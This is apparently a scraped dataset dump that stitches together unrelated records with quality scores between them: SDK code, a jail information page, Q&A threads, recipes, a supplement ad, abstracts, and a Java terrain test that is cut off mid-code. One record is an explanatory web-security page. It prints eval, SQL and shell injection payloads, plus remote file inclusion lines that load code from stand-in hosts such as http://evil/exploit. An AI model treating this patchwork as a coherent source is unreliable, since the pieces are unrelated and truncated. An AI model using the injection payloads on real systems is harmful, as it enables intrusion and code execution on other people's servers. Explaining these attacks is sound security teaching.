m_addArgumentsHasBeenSet = true; m_addArguments.emplace(std::move(key), value); return *this; } /** * <p>The map of arguments to add the map of arguments used to configure the * <code>DevEndpoint</code>.</p> <p>Valid arguments are:</p> <ul> <li> <p> * <code>"--enable-glue-datacatalog": ""</code> </p> </li> <li> <p> * <code>"GLUE_PYTHON_VERSION": "3"</code> </p> </li> <li> <p> * <code>"GLUE_PYTHON_VERSION": "2"</code> </p> </li> </ul> <p>You can specify a * version of Python support for development endpoints by using the * <code>Arguments</code> parameter in the <code>CreateDevEndpoint</code> or * <code>UpdateDevEndpoint</code> APIs. If no arguments are provided, the version * defaults to Python 2.</p> */ inline UpdateDevEndpointRequest& AddAddArguments(const Aws::String& key, Aws::String&& value) { m_addArgumentsHasBeenSet = true; m_addArguments.emplace(key, std::move(value)); return *this; } /** * <p>The map of arguments to add the map of arguments used to configure the * <code>DevEndpoint</code>.</p> <p>Valid arguments are:</p> <ul> <li> <p> * <code>"--enable-glue-datacatalog": ""</code> </p> </li> <li> <p> * <code>"GLUE_PYTHON_VERSION": "3"</code> </p> </li> <li> <p> * <code>"GLUE_PYTHON_VERSION": "2"</code> </p> </li> </ul> <p>You can specify a * version of Python support for development endpoints by using the * <code>Arguments</code> parameter in the <code>CreateDevEndpoint</code> or * <code>UpdateDevEndpoint</code> APIs. If no arguments are provided, the version * defaults to Python 2.</p> */ inline UpdateDevEndpointRequest& AddAddArguments(Aws::String&& key, Aws::String&& value) { m_addArgumentsHasBeenSet = true; m_addArguments.emplace(std::move(key), std::move(value)); return *this; } /** * <p>The map of arguments to add the map of arguments used to configure the * <code>DevEndpoint</code>.</p> <p>Valid arguments are:</p> <ul> <li> <p> * <code>"--enable-glue-datacatalog": ""</code> </p> </li> <li> <p> * <code>"GLUE_PYTHON_VERSION": "3"</code> </p> </li> <li> <p> * <code>"GLUE_PYTHON_VERSION": "2"</code> </p> </li> </ul> <p>You can specify a * version of Python support for development endpoints by using the * <code>Arguments</code> parameter in the <code>CreateDevEndpoint</code> or * <code>UpdateDevEndpoint</code> APIs. If no arguments are provided, the version * defaults to Python 2.</p> */ inline UpdateDevEndpointRequest& AddAddArguments(const char* key, Aws::String&& value) { m_addArgumentsHasBeenSet = true; m_addArguments.emplace(key, std::move(value)); return *this; } /** * <p>The map of arguments to add the map of arguments used to configure the * <code>DevEndpoint</code>.</p> <p>Valid arguments are:</p> <ul> <li> <p> * <code>"--enable-glue-datacatalog": ""</code> </p> </li> <li> <p> * <code>"GLUE_PYTHON_VERSION": "3"</code> </p> </li> <li> <p> * <code>"GLUE_PYTHON_VERSION": "2"</code> </p> </li> </ul> <p>You can specify a * version of Python support for development endpoints by using the * <code>Arguments</code> parameter in the <code>CreateDevEndpoint</code> or * <code>UpdateDevEndpoint</code> APIs. If no arguments are provided, the version * defaults to Python 2.</p> */ inline UpdateDevEndpointRequest& AddAddArguments(Aws::String&& key, const char* value) { m_addArgumentsHasBeenSet = true; m_addArguments.emplace(std::move(key), value); return *this; } /** * <p>The map of arguments to add the map of arguments used to configure the * <code>DevEndpoint</code>.</p> <p>Valid arguments are:</p> <ul> <li> <p> * <code>"--enable-glue-datacatalog": ""</code> </p> </li> <li> <p> * <code>"GLUE_PYTHON_VERSION": "3"</code> </p> </li> <li> <p> * <code>"GLUE_PYTHON_VERSION": "2"</code> </p> </li> </ul> <p>You can specify a * version of Python support for development endpoints by using the * <code>Arguments</code> parameter in the <code>CreateDevEndpoint</code> or * <code>UpdateDevEndpoint</code> APIs. If no arguments are provided, the version * defaults to Python 2.</p> */ inline UpdateDevEndpointRequest& AddAddArguments(const char* key, const char* value) { m_addArgumentsHasBeenSet = true; m_addArguments.emplace(key, value); return *this; } private: Aws::String m_endpointName; bool m_endpointNameHasBeenSet; Aws::String m_publicKey; bool m_publicKeyHasBeenSet; Aws::Vector<Aws::String> m_addPublicKeys; bool m_addPublicKeysHasBeenSet; Aws::Vector<Aws::String> m_deletePublicKeys; bool m_deletePublicKeysHasBeenSet; DevEndpointCustomLibraries m_customLibraries; bool m_customLibrariesHasBeenSet; bool m_updateEtlLibraries; bool m_updateEtlLibrariesHasBeenSet; Aws::Vector<Aws::String> m_deleteArguments; bool m_deleteArgumentsHasBeenSet; Aws::Map<Aws::String, Aws::String> m_addArguments; bool m_addArgumentsHasBeenSet; }; } // namespace Model } // namespace Glue } // namespace Aws
Mid
[ 0.597849462365591, 34.75, 23.375 ]
Having a friend or loved one booked into jail can create confusion and uncertainty, both for the inmate and for the friends or loved ones involved. You may have questions about mail, phone calls, visiting, health care, and many more areas. You will find it difficult to contact the person who was arrested for some time following the arrest and booking. The nature of the jail system may make it difficult for you acquire the information you need concerning the arrest. This web page and the information contained herein was designed to help you understand the Cumberland County Sheriff’s Office Jail System. These pages are meant to provide you with the information necessary to help you interact effectively with jail staff while supporting your family member or friend in custody. WHAT HAPPENS WHEN A PERSON IS BOOKED INTO CUMBERLAND COUNTY JAIL? When people are arrested they may be taken to the local police station where they may be interviewed, and where necessary reports and forms are prepared. If the individual is arrested for driving while impaired, a breath, or blood chemical test will be conducted. This process can take four hours or more before the person is committed to the county jail. Since a good deal of time may pass before the jail system has any notification of a person’s arrest, if you call shortly after your friend or loved one is arrested you may find that they are not yet in the jail system. Do not be concerned by this delay, as the pre-booking process is routine and necessary. When arrested individuals arrive at the jail facility, they go through the intake and booking process before being housed in the inmate population. This process takes from four to eight hours and is comprised of medical screening, mental health screening, identification processes, warrant checks and clerical matters. A private medical screening by a member of the jail medical staff usually occurs at booking to make sure the inmate is not injured or in need of immediate medical treatment. A second screening is conducted to ensure that all conditions that an inmate may have are properly noted and that the facility is capable of meeting the inmate’s medical needs. During the intake and booking process the inmates are searched to make sure that no contraband is being brought in to the facility. They are photographed and fingerprinted. Their personal information is entered into the jails computer information management system, bail is determined by a judicial official and a court date is set. Some inmates may be eligible for release at intake on their own very soon after arrival at the facility. Intoxicated inmates may be held up to 24 hours, and sometimes longer, to ensure that they are sober enough to be safely released. Most inmates are eligible for bail, and they have access to telephones to allow them to contact assistance to arrange bail through family, friends or bail agents. When it is determined that an inmate will not make bail in the period immediately following admission, they are assigned to a housing unit based on their classification and other criteria.
High
[ 0.663484486873508, 34.75, 17.625 ]
Q: Member functions I am getting an error at the line "void operation" when I compile, because I havent defined Gate_ptr yet. I thought of exchanging the "Gate_ptr" with just "Gate*" instead in the function def. However, is there a way to maintain my current style? class Gate { public: Gate(); void operation(Gate_ptr &gate_tail, string type, int input1, int input2=NULL); private: int cnt2; int input_val1, input_val2; int output, gate_number; int input_source1, input_source2; int fanout[8]; Gate* g_next; string type; }; typedef Gate* Gate_ptr; A: Prefer this order: //forward decleration class Gate; //typedef based on forward dec. typedef Gate* Gate_ptr; //class definition class Gate { public: //... }; A: Forwared declare, do the typedef, then define the class: class Gate; typedef Gate* Gate_ptr; class Gate { public: Gate(); void operation(Gate_ptr &gate_tail, string type, int input1, int input2=NULL); private: int cnt2; int input_val1, input_val2; int output, gate_number; int input_source1, input_source2; int fanout[8]; Gate* g_next; string type; };
Mid
[ 0.649237472766884, 37.25, 20.125 ]
Pulse Omega-3 Pure Fish Oils Capsules- Triple Pack Description Pulse Omega-3 Pure Fish Oils Capsules contain Long Chain (LC) Omega-3 Polyunsaturated Fatty Acids for everyday health maintenance. Pulse Omega-3 Pure Fish Oils are a natural rich source of Long Chain (LC) Omega-3 fatty acids. Pulse soft Omega-3 Pure Fish Oil capsules contain a blend of two important ingredients called eicosapentaenoic acid (EPA) and docosahexaenoic acid (DHA), which are concentrated from selected natural fish oils high in LC Omega-3 nutrients. LC Omega-3 nutrients are beneficial in the maintenance of our everyday good health. The LC Omega-3 nutrients EPA & DHA help keep joints flexible. The LC Omega-3 nutrient DHA is a structural part of the brain and may play a part in supporting a healthy brain function. Medical research continues to suggest that the LC Omega-3 nutrient EPA is particularly important in maintaining heart health. The Inuit and Japanese have a diet rich in fish oils, which are virtually absent from the typical Western diet. Oil-rich fish is an alternative source of LC Omega-3 polyunsaturated fatty acids. Today's hectic lifestyles can sometimes make if difficult to maintain a healthy diet. The Government advises that at least two servings of fish, one of which should be oily, containing approximately 3g of LC Omega-3 polyunsaturated fatty acids is consumed each week. Pulse Omega-3 Pure Fish Oils also contain vitamin E, a natural antioxidant and protector of cells. Pulse Omega-3 Pure Fish Oil are a natural rich source of LC Omega-3 nutrients and provide an easy and convenient way to ensure a regular daily intake in a convenient taste free non-gelatin capsule. They help maintain heart health and may help support a healthy brain function. They also help keep joints flexible. Unless you eat fish regularly, it may be wise to boost your levels of LC Omega-3 fish oil nutrients by taking 2 Pulse capsules daily. LC Omega-3 fatty acids are beneficial in the maintenance of our everyday good health. Today more than ever before, people are doing more to look after their health. They are cutting down on alcohol, giving up smoking, eating a sensible, balanced diet, and taking regular exercise to help maintain their ideal weight.
Mid
[ 0.645408163265306, 31.625, 17.375 ]
Nav Social Menu Fondue Pork Fondue in Lemongrass Broth keeps the broth fondue’s new and interesting! The holiday season is a time to build lasting memories with family and friends. It allows you to reconnect with those you don’t see or speak to very often, and gives the opportunity to create new traditions with those you love. Pork Fondue in Lemongrass Broth We have several Christmas traditions in our home we factor in every December and a few of these include opening new pyjamas on Christmas Eve, and marking off December days on an advent calendar. These are the moments we carry with us, not the gifts we receive, and it’s these special times we like to reflect upon with our own family while we create new memories. As children we did not have family close by, so Christmas’s were spent with friends. There would be Christmas music and singing, a traditional turkey dinner complete with Christmas cake, and lots of laughter. As adults with our own families we also spend Christmas with friends since our family is not near by. Pork Fondue in Lemongrass Broth One of our holiday traditions is to fondue with friends Christmas Eve. If we have time we also fondue on New Year’s Eve. The Christmas Eve Fondue-palooza evening begins with a gathering of friends at The Festival of Lights at Confederation Park, for a wander through the Christmas lights and some sledding until it gets too cold. After an hour or two at the park, we head back to the house to prepare for our potluck fondue evening. Every family pitches in bringing food and beverages. This broth fondue can be prepared in advance and reheated when it’s time to eat. In addition there are several cheese fondues on the table, like a classic Swiss Fondue. And a simple Chocolate Fondue. Fondue is an exciting way to get family and friends together around the table, and initiate some great conversations while having fun with your food. Here is one of several broth fondues we enjoy during the season, Pork Fondue in Lemongrass Broth. Freeze leftover cooled off broth and use later one in soups and stews. Disclosure: This post was sponsored by the makers of ZANTAC®, but the opinions expressed are my own. The world of fondue is a fun one. With so many varieties of fondue to partake in, you could eat Fondue every night and never get bored. This Old Cheddar Cheese & Bacon Fondue is one of our favourites and contains an ingredient that surprises most people! Old Cheddar Cheese and Bacon Fondue A favourite in this house, this fondue is loaded with old cheddar cheese and bacon. It’s extra fun because it’s always a battle at the end to fish out the last pieces of bacon and fortunately there have never been any causalities during battle bacon, yet. Other favourite cheese fondues of ours? One with beer and of course the Classic Swiss Fondue. The surprise ingredient I referenced earlier, it’s sour cream. You will be surprised when you taste this fondue, you will not even know there is sour cream in it. Sour cream adds a hint of tart to the fondue and replaces the need for any additional acid. Plus it’s a natural thickener. Old Cheddar Cheese & Bacon Fondue When we fondue we like to have two or more fondues on the table. A cheese fondue variation and a meat in broth fondue. The kids are slowly coming round to cheese fondue, have always loved the broth ones and request Chocolate Fondue regularly. It’s actually a fun way to wind up or down a birthday party gathering. Since we enjoy fondueing, we try new variations all the time. Some make the cut, some not so much, however it’s definitely a fun evening to have with family or friends! If you try our Old Cheddar Cheese & Bacon Fondue let us know what you think in the comments below! A Chocolate Fondue that is simple to make, easy to eat and will leave your guests so impressed they want to buy their own fondue pot! Chocolate Fondue Our chocolate fondue recipe is one I have made so many times it’s forever lodged in my brain. As long as I have a proper fondue pot, and access to ingredients, I can make it anywhere. Sometimes we make it with booze, sometimes we don’t. The alcohol does add a slight hint of flavour depending on which kind you use. Same with sprinkles, sometimes we use them, sometimes we don’t. That is the great thing about this fondue, you can change it up ever so slightly each time and the sprinkles are really for the kids. The Fondue Pot It’s important to use the correct pot when making a chocolate or dessert fondue. These pots are designed specifically for desserts and typically come in earthenware, ceramic, porcelain or even tempered glass but we stay away from glass. They will be smaller and their heat sources are candle or gel fuel burner to keep the chocolate warm without over heating. Chocolate Fondue Chocolate Fondue Dippers Dippers for a chocolate fondue are the funnest ingredients to prepare and sample while preparing! Here’s a few dippers we have tried over the years all sliced in to bite size pieces where applicable. The first time I had an authentic Classic Swiss Fondue was in Lucerne, Switzerland at the Stadtkeller Restaurant during our European vacation back in the 90s. Swiss Fondue One could say I quite enjoyed the taste of a classic swiss fondue. We also took in a folklore show while enjoying our fondue in Switzerland, and did some yodeling which I failed at miserably. In Switzerland I learned the components of a Swiss Fondue are simple; wine, garlic, cheese, (Gruyere and Michaël Tell Alp cheese or an Emmentaler cheese) and sometimes before serving they add a touch of kirsch. Since kirsch is an acquired taste, I tend to leave it out. When fondue became big back in the 70s, people put their own spin on a Swiss Fondue still using these the same ingredients. Some prefer to rub the fondue pot with garlic, I see no point in this. In Lucerne they put the garlic in the fondue and leave it. I prefer not to have garlic swimming in my cheese. Swiss Fondue with dippers I slice the garlic into a few pieces and add it to the wine to simmer for a 1-2 minutes. The garlic is then removed from the wine before the cheese is added. The flavour of the garlic is left in the fondue without any bits. Besides cheese and chocolate, there are two other fondues I learned about in Switzerland; chinoise fondue (a Chinese meat turned soup) or bourguignonne fondue (a Swiss meat in oil). Due to splatter, residue and other reasons, we stay away from oil and prefer broth (chinoise style). Swiss Cheese Fondue As in other fondues we do, cheese fondues come in many varieties. If you love to fondue and want to expand your fondue horizons, check out our Old Cheddar Cheese & Bacon Fondue. Did you know that vendors in Switzerland sell a pre-made shredded blend of cheese ready to go? This is due to the popularity of fondue in Switzerland. Enjoy this healthy and delicious Teriyaki Beef Fondue with all your favourite dippers and a few you may not have thought about. This Teriyaki Beef Fondue is one of the first recipes I ever added to my blog back in 2006. Amazing how time flies. Fondue has been around for well over fifty years as it was huge back in the 1970’s and since then it’s popularity continues to come and go. But it’s never gone away. My parents never owned a fondue, but I thought melting cheese in a fry pan and dipping bread in the melted cheese was spectacular. I got my first fondue when I moved to Vancouver (1989) and my whole world became much happier (cheese and bread, need I say more). I fondued throughout the 1990’s and accessories were readily available everywhere. Met my husband and learned quickly he loves fondue too. So we kept adding to our hardware collection and trying new recipes. Now we fondue as a family as it’s such a fun way to spend an evening with friends, family or even just the four of us. Great food, drink and conversation. We mostly do a broth variation, couple of cheese and a dessert fondue. We rarely ever do oil as we find it leaves an oil residue in the house, on our clothes and in our hair. Plus broth is more flavourful, a healthier option, and safer if your kids are young. We prepare a variety of items for dipping. With broth fondue you can dip par boiled baby potatoes, smoked cooked sausage or pepperoni, the kids like dipping mushrooms and even some vegetable pieces (no judging). For cheese we run the gauntlet here and prepare cauliflower, lightly steamed broccoli, bread, taco chips, an array of veggies, and more. Plus crossover the sausage, pepperoni and baby potatoes for more fun on your stick. This fondue is flavourful and to enhance it even more we marinate the beef overnight which adds the wow factor to the beef. Once we are finished fondueing we freeze the leftover broth for later use in a beef stew, soup or casserole of sorts. Right now we are into electric fondue pots for our broth and the fondue oil pot for our cheese or chocolate fondues. Electric fondue pots allow us to better regulate the temperature for our meat fondues. Always have additional broth on hand as it cooks down and intensifies the flavour as it simmers in your pot. Making it the perfect leftover pot of brothy goodness. PRO TIPS: If you have remaining beef leftover, cook it all at the end and save it for adding to wraps or sandwiches the next day. Cool down leftover broth and freeze for later use in soups, stews and any dish requiring beef broth. We further make sure everyone has at least 2-3 sticks on hand. One for meat and one for cheese. Leftover raw meat gets tossed into the pot for a quick cook and refrigerating before cooling the broth down to freeze. Try this fun fondue on your next date night, family gathering or hanging out with friends. Primary Sidebar Looking for a recipe? Looking for a recipe? Footer Instagram Get new posts by email About this site Join me on my adventures both in and out of the kitchen! We travel in search of new experiences, go on adventures both near and far and cook in the kitchen creating new recipes, re-create recipes from previous generations, and seek out crazy food combinations yet sticking true to comfort food and simple recipes.
Low
[ 0.5131004366812221, 29.375, 27.875 ]
Q: How can there be a potential difference if a magnetc field can't do work? If I move a wire through a magnetic field, then it should make a potential difference. If I put it on tracks so that it moves in a straight line, then it should be able to continually move without any force acting on it. However, it is still moving, so it should produce a potential difference, which I can use to power something like a light bulb. Where does this energy come from? A: When you move a wire through a magnetic field an emf is induced. If the wire is on tracks and there is no complete conducting circuit and so no induced current then the wire will continue to move at constant velocity. If there is a complete conducting circuit then there will be an induced current which, according to Lenz, will be in such a direction as to oppose the motion producing it. The current carrying wire moving in the magnetic force on it which is in the opposite direction to its movement. If the wire has no other forces acting on it then that force due to the induced current will slow the wire down. The net effect is that the decrease in kinetic energy of the wire is equal to the electrical energy generated by the wire as it moves through the magnetic field which ultimately finishes up as heat due to ohmic heating (and light if there is a light bulb ) in the conducting circuit. If you want the velocity of the wire to stay constant then you must apply a force on the wire to oppose the force due to the induced current and so you must do work to maintain the constant velocity motion of the wire. Using the symbols defined in the diagram is the resistance of the circuit is $R$ then the electrical power produced is $\dfrac{(Blv)^2}{R}$ whilst the mechanical power needed to keep the wire moving at constant velocity is $Fv = BIl\,v$. As $I = \dfrac{Blv}{R}$ the mechanical power input is $\dfrac{(Blv)^2}{R}$ which is exactly equal to the electrical power output. So it is not the magnetic field doing the work, it is you who is doing the work to generate the electrical energy.
Mid
[ 0.631828978622327, 33.25, 19.375 ]
############################################################################## # # Copyright Zope Foundation and Contributors. # All Rights Reserved. # # This software is subject to the provisions of the Zope Public License, # Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution. # THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED # WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED # WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS # FOR A PARTICULAR PURPOSE. # ############################################################################## try: from zope.event import notify except ImportError: notify = lambda event: None
Low
[ 0.456026058631921, 35, 41.75 ]
--- layout: col-sidebar title: Direct Dynamic Code Evaluation - Eval Injection author: contributors: permalink: /attacks/Direct_Dynamic_Code_Evaluation_Eval Injection tags: attack, direct dynamic code evaluation, eval injection auto-migrated: 1 --- {% include writers.html %} ## Description This attack consists of a script that does not properly validate user inputs in the page parameter. A remote user can supply a specially crafted URL to pass arbitrary code to an eval() statement, which results in code execution. Note 1: This attack will execute the code with the same permission like the target web service, including operation system commands. Note 2: Eval injection is prevalent in handler/dispatch procedures that might want to invoke a large number of functions, or set a large number of variables. Risk Factors TBD Examples Example 1 In this example an attacker can control all or part of an input string that is fed into an eval() function call $myvar = "varname"; $x = $_GET['arg']; eval("\$myvar = \$x;"); The argument of "eval" will be processed as PHP, so additional commands can be appended. For example, if "arg" is set to "10 ; system(\"/bin/echo uh-oh\");", additional code is run which executes a program on the server, in this case "/bin/echo". Example 2 The following is an example of SQL Injection. Consider a web page which has two fields to allow users to enter a Username and a Password. The code behind the page will generate a SQL query to check the Password against the list of Usernames: SELECT UserList.Username FROM UserList WHERE UserList.Username = 'Username' AND UserList.Password = 'Password' If this query returns exactly one row, then access is granted. However, if a malicious user enters a valid Username and injects some valid code ("' OR 1=1") in the Password field, then the resulting query will look like this: SELECT UserList.Username FROM UserList WHERE UserList.Username = 'Username' AND UserList.Password = 'Password' OR '1'='1' In the example above, "Password" is assumed to be blank or some innocuous string. "1=1" will always be true and many rows will be returned, thereby allowing access. The final inverted comma will be ignored by the SQL parser. The technique may be refined to allow multiple statements to run, or even to load up and run external programs. Example 3 This is an example of a file that was injected. Consider this PHP program (which includes a file specified by request): <?php $color = 'blue'; if ( isset( $_GET['COLOR'] ) ) $color = $_GET['COLOR']; require( $color . '.php' ); ?> <form> <select name="COLOR"> <option value="red">red</option> <option value="blue">blue</option> </select> <input type="submit"> </form> The developer thought this would ensure that only blue.php and red.php could be loaded. But as anyone can easily insert arbitrary values in COLOR, it is possible to inject code from files: /vulnerable.php?COLOR=http://evil/exploit - injects a remotely hosted file containing an exploit. /vulnerable.php?COLOR=C:\ftp\upload\exploit - injects an uploaded file containing an exploit. /vulnerable.php?COLOR=..\..\..\..\ftp\upload\exploit - injects an uploaded file containing an exploit, using Path Traversal. /vulnerable.php?COLOR=C:\notes.txt%00 - example using Null character, Meta character to remove the .php suffix, allowing access to other files than .php. (PHP setting "magic_quotes_gpc = On", which is default, would stop this attack) Example 4 A simple URL which demonstrates a way to do this attack: http://some-page/any-dir/index.php?page=<?include($s);?>&s=http://malicious-page/cmd.txt? Example 5 Shell Injection applies to most systems which allow software to programmatically execute a Command line. Typical sources of Shell Injection are calls system(), StartProcess(), java.lang.Runtime.exec() and similar APIs. Consider the following short PHP program, which runs an external program called funnytext to replace a word the user sent with some other word. <HTML> <?php passthru ( " /home/user/phpguru/funnytext " . $_GET['USER_INPUT'] ); ?> This program can be injected in multiple ways: `command` will execute command. $(command) will execute command. ; command will execute command, and output result of command. | command will execute command, and output result of command. && command will execute command, and output result of command. || command will execute command, and output result of command. > /home/user/phpguru/.bashrc will overwrite file .bashrc. < /home/user/phpguru/.bashrc will send file .bashrc as input to funnytext. PHP offers escapeshellarg() and escapeshellcmd() to perform encoding before calling methods. However, it is not recommended to trust these methods to be secure - also validate/sanitize input. Example 6 The following code is vulnerable to eval() injection, because it don’t sanitize the user’s input (in this case: “username”). The program just saves this input in a txt file, and then the server will execute this file without any validation. In this case the user is able to insert a command instead of a username. Example: <% If not isEmpty(Request( "username" ) ) Then Const ForReading = 1, ForWriting = 2, ForAppending = 8 Dim fso, f Set fso = CreateObject("Scripting.FileSystemObject") Set f = fso.OpenTextFile(Server.MapPath( "userlog.txt" ), ForAppending, True) f.Write Request("username") & vbCrLf f.close Set f = nothing Set fso = Nothing %> <h1>List of logged users:</h1> <pre> <% Server.Execute( "userlog.txt" ) %> </pre> <% Else %> <form> <input name="username" /><input type="submit" name="submit" /> </form> <% End If %> Related Threat Agents Internal software developer Related Attacks Direct Static Code Injection Code Injection Injection Attacks Related Vulnerabilities Category:Input Validation Vulnerability Related Controls Category:Input Validation References http://secunia.com/cve_reference/CVE-2006-2005/?show_result=1 http://en.wikipedia.org/wiki/Code_injection
High
[ 0.6589861751152071, 35.75, 18.5 ]
Composites ability to retain functionality in the presence of damage is a crucial safety and economic issue. Generally the first damage mode in composite laminates is matrix cracking, which affects the mechanical properties ... The energy dissipated in cross-ply laminates during loading–unloading loops is obtained from stress–strain curves for cross-ply laminates and used in an energy based approach to predict the development of matrix cracking. ... A Raman spectroscopic technique was used to investigate the elastic modulus degradation and the residual strain development in cross-ply and [0/452/0]T glass fibre/epoxy laminates. Glass has a poor Raman signal and, ... Intralaminar matrix cracking is recognized as the primary mode of damage appearing in laminates. Local Raman strain measurements in neighboring layers show that the distribution shape in the vicinity of the crack tip is ... “Damage tolerance” is used to describe the attribute of a structure associated with the retention of the required residual strength throughout its service life, while irreversible damage mechanisms are active within the ...
High
[ 0.6650366748166251, 34, 17.125 ]
package jme3test.terrain; import com.jme3.app.SimpleApplication; import com.jme3.app.state.ScreenshotAppState; import com.jme3.asset.plugins.HttpZipLocator; import com.jme3.asset.plugins.ZipLocator; import com.jme3.bullet.BulletAppState; import com.jme3.bullet.collision.shapes.CapsuleCollisionShape; import com.jme3.bullet.collision.shapes.HeightfieldCollisionShape; import com.jme3.bullet.control.CharacterControl; import com.jme3.bullet.control.RigidBodyControl; import com.jme3.input.KeyInput; import com.jme3.input.MouseInput; import com.jme3.input.controls.ActionListener; import com.jme3.input.controls.KeyTrigger; import com.jme3.input.controls.MouseButtonTrigger; import com.jme3.material.Material; import com.jme3.math.ColorRGBA; import com.jme3.math.Quaternion; import com.jme3.math.Vector3f; import com.jme3.terrain.Terrain; import com.jme3.terrain.geomipmap.TerrainGrid; import com.jme3.terrain.geomipmap.TerrainGridListener; import com.jme3.terrain.geomipmap.TerrainGridLodControl; import com.jme3.terrain.geomipmap.TerrainLodControl; import com.jme3.terrain.geomipmap.TerrainQuad; import com.jme3.terrain.geomipmap.grid.AssetTileLoader; import com.jme3.terrain.geomipmap.lodcalc.DistanceLodCalculator; import com.jme3.texture.Texture; import com.jme3.texture.Texture.WrapMode; import java.io.File; public class TerrainGridTileLoaderTest extends SimpleApplication { private Material mat_terrain; private TerrainGrid terrain; private float grassScale = 64; private float dirtScale = 16; private float rockScale = 128; private boolean usePhysics = true; private boolean physicsAdded = false; public static void main(final String[] args) { TerrainGridTileLoaderTest app = new TerrainGridTileLoaderTest(); app.start(); } private CharacterControl player3; @Override public void simpleInitApp() { File file = new File("TerrainGridTestData.zip"); if (!file.exists()) { assetManager.registerLocator("http://jmonkeyengine.googlecode.com/files/TerrainGridTestData.zip", HttpZipLocator.class); } else { assetManager.registerLocator("TerrainGridTestData.zip", ZipLocator.class); } this.flyCam.setMoveSpeed(100f); ScreenshotAppState state = new ScreenshotAppState(); this.stateManager.attach(state); // TERRAIN TEXTURE material this.mat_terrain = new Material(this.assetManager, "Common/MatDefs/Terrain/HeightBasedTerrain.j3md"); // Parameters to material: // regionXColorMap: X = 1..4 the texture that should be appliad to state X // regionX: a Vector3f containing the following information: // regionX.x: the start height of the region // regionX.y: the end height of the region // regionX.z: the texture scale for the region // it might not be the most elegant way for storing these 3 values, but it packs the data nicely :) // slopeColorMap: the texture to be used for cliffs, and steep mountain sites // slopeTileFactor: the texture scale for slopes // terrainSize: the total size of the terrain (used for scaling the texture) // GRASS texture Texture grass = this.assetManager.loadTexture("Textures/Terrain/splat/grass.jpg"); grass.setWrap(WrapMode.Repeat); this.mat_terrain.setTexture("region1ColorMap", grass); this.mat_terrain.setVector3("region1", new Vector3f(88, 200, this.grassScale)); // DIRT texture Texture dirt = this.assetManager.loadTexture("Textures/Terrain/splat/dirt.jpg"); dirt.setWrap(WrapMode.Repeat); this.mat_terrain.setTexture("region2ColorMap", dirt); this.mat_terrain.setVector3("region2", new Vector3f(0, 90, this.dirtScale)); // ROCK texture Texture rock = this.assetManager.loadTexture("Textures/Terrain/Rock2/rock.jpg"); rock.setWrap(WrapMode.Repeat); this.mat_terrain.setTexture("region3ColorMap", rock); this.mat_terrain.setVector3("region3", new Vector3f(198, 260, this.rockScale)); this.mat_terrain.setTexture("region4ColorMap", rock); this.mat_terrain.setVector3("region4", new Vector3f(198, 260, this.rockScale)); this.mat_terrain.setTexture("slopeColorMap", rock); this.mat_terrain.setFloat("slopeTileFactor", 32); this.mat_terrain.setFloat("terrainSize", 129); //quad.getHeightMap(), terrain.getLocalScale()), 0 AssetTileLoader grid = new AssetTileLoader(assetManager, "testgrid", "TerrainGrid"); this.terrain = new TerrainGrid("terrain", 65, 257, grid); this.terrain.setMaterial(this.mat_terrain); this.terrain.setLocalTranslation(0, 0, 0); this.terrain.setLocalScale(2f, 1f, 2f); // try { // BinaryExporter.getInstance().save(terrain, new File("/Users/normenhansen/Documents/Code/jme3/engine/src/test-data/TerrainGrid/" // + "TerrainGrid.j3o")); // } catch (IOException ex) { // Logger.getLogger(TerrainFractalGridTest.class.getName()).log(Level.SEVERE, null, ex); // } this.rootNode.attachChild(this.terrain); TerrainLodControl control = new TerrainGridLodControl(this.terrain, getCamera()); control.setLodCalculator( new DistanceLodCalculator(65, 2.7f) ); // patch size, and a multiplier this.terrain.addControl(control); final BulletAppState bulletAppState = new BulletAppState(); stateManager.attach(bulletAppState); this.getCamera().setLocation(new Vector3f(0, 256, 0)); cam.setRotation(new Quaternion(-0.0075f, 0.949784f, -0.312f, -0.0227f)); this.viewPort.setBackgroundColor(new ColorRGBA(0.7f, 0.8f, 1f, 1f)); if (usePhysics) { CapsuleCollisionShape capsuleShape = new CapsuleCollisionShape(0.5f, 1.8f, 1); player3 = new CharacterControl(capsuleShape, 0.5f); player3.setJumpSpeed(20); player3.setFallSpeed(10); player3.setGravity(10); player3.setPhysicsLocation(new Vector3f(cam.getLocation().x, 256, cam.getLocation().z)); bulletAppState.getPhysicsSpace().add(player3); terrain.addListener(new TerrainGridListener() { @Override public void gridMoved(Vector3f newCenter) { } @Override public void tileAttached(Vector3f cell, TerrainQuad quad) { while(quad.getControl(RigidBodyControl.class)!=null){ quad.removeControl(RigidBodyControl.class); } quad.addControl(new RigidBodyControl(new HeightfieldCollisionShape(quad.getHeightMap(), terrain.getLocalScale()), 0)); bulletAppState.getPhysicsSpace().add(quad); } @Override public void tileDetached(Vector3f cell, TerrainQuad quad) { if (quad.getControl(RigidBodyControl.class) != null) { bulletAppState.getPhysicsSpace().remove(quad); quad.removeControl(RigidBodyControl.class); } } }); } this.initKeys(); } private void initKeys() { // You can map one or several inputs to one named action this.inputManager.addMapping("Lefts", new KeyTrigger(KeyInput.KEY_A)); this.inputManager.addMapping("Rights", new KeyTrigger(KeyInput.KEY_D)); this.inputManager.addMapping("Ups", new KeyTrigger(KeyInput.KEY_W)); this.inputManager.addMapping("Downs", new KeyTrigger(KeyInput.KEY_S)); this.inputManager.addMapping("Jumps", new KeyTrigger(KeyInput.KEY_SPACE)); this.inputManager.addMapping("pick", new MouseButtonTrigger(MouseInput.BUTTON_LEFT)); this.inputManager.addListener(this.actionListener, "Lefts"); this.inputManager.addListener(this.actionListener, "Rights"); this.inputManager.addListener(this.actionListener, "Ups"); this.inputManager.addListener(this.actionListener, "Downs"); this.inputManager.addListener(this.actionListener, "Jumps"); this.inputManager.addListener(this.actionListener, "pick"); } private boolean left; private boolean right; private boolean up; private boolean down; private final ActionListener actionListener = new ActionListener() { @Override public void onAction(final String name, final boolean keyPressed, final float tpf) { if (name.equals("Lefts")) { if (keyPressed) { TerrainGridTileLoaderTest.this.left = true; } else { TerrainGridTileLoaderTest.this.left = false; } } else if (name.equals("Rights")) { if (keyPressed) { TerrainGridTileLoaderTest.this.right = true; } else { TerrainGridTileLoaderTest.this.right = false; } } else if (name.equals("Ups")) { if (keyPressed) { TerrainGridTileLoaderTest.this.up = true; } else { TerrainGridTileLoaderTest.this.up = false; } } else if (name.equals("Downs")) { if 